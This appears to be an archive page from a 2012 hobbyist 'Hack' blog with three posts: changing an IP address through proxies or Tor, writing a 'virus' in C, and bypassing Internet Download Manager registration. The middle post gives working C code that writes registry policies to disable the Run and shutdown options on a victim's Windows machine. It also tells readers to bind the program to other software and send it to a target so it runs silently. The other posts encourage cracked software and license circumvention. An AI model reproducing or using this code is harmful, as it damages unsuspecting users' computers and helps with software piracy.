Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts
on Wednesday, 16 May 2012
Hey, Friends

Today we will learn how to change your IP address .I am telling you all the way to change  IP address.
There are mainly three ways to change your IP address.

First Way,

There are proprietary software to change IP address.Here is the list

1.Quick Hide IP Platinum 1.2.3

and so on...

There are so many software to do this.
If you have luck then you can also get crack version of this software in torrent.

Second Way,

There is browser called TOR(The Onion Router) to change your IP address.
The good news is this is Open Source browser.
Here is the download link.-->

After downloading tor browser and open
Your ip will change.Now  anything you browse in TOR browser is Private.

Third Way,

First of all open this site.-->

There is thousand of port and IP address.Now pick one of them.
I choose below one.

To use this follow this step.

For Firefox user,

Goto option-->Advanced , Now under advanced tab go into network tab and then into setting option.
For better understanding.

Now in setting choose manual proxy configuration . and paste your new ip and port .
Like this.
Now search "check my ip" in google.
Your ip is changed.

For Chrome user,

then in that go at the last and select show advanced setting  
In that go to network and click change proxy setting.
In that select LAN setting(For Lan users) and choose setting (For Dial up setting)
For both under proxy server select check box.
For Lan
For Dial Up
I recommended you change both setting.
Now restart your browser and search in google "Check my ip".
Your IP has been changed.

Don't be a silent reader.
If you like it then comment or share on your social network..........................

on Wednesday, 2 May 2012
Ok , Friends

Today's interesting topic is how to make simple virus using c language.

I will teach you hoe to edit registry using C . And make virus which is editing target's registry.This virus disable RUN option from entire OS(Operating System) and also disable shut down option .

Just copy/paste below C code.

void main()
   system("REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun /t REG_DWORD /d 1");
   system("REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoClose /t REG_DWORD /d 1");

Now save this file as .c extension and compile and run it using compiler like Turbo c or Code Block etc.

Compiler make .exe file.Now using one of the exebinder software bind this exe file with you software and send it to your friend or target's pc.

When target install that software , upward exe file of virus silently run and when target restart or log off computer virus will do it's work..And there is no shutdown and run option in Target's computer.

Note:This is just for learning purpose.

If you enjoyed it then plz comment or share this post..................
on Tuesday, 17 April 2012
Today, I am going to tell you one interesting trick of IDM (Internet Download Manager).

I see most of people who use internet are finding trick to pass through registration of IDM without crack or purchasing it online.

Here is the steps.
  1. First find "etc" directory in drive in which you installed windows.                Here is path:C:\Windows\System32\drivers.  
  2.  Now in "etc" directory there is  "Hosts" file.Change it permission by Right click on file->Properties.
  3. Now in properties go into "security" tab next to the "General" tab.Now in security tab select "users" under "Group and username." Click on "Edit" button.Then again select "users" under "Group and username." Give full control under "Permission of users" . 
  4. Click OK...
  Here is snapshot.

Now , open "Hosts" file in notepad.And add following lines to end of the file. 

After editing file like this.

After that
Enter registration detail in IDM.
In 'Name' enter your good name.
In 'Last name' enter your last name whatever it is.
In 'Email' enter your email address(Original or fake).
In 'Serial no.' enter serial no. from following.


NOTE: During this process net should not be connected..

I wish you enjoy it...........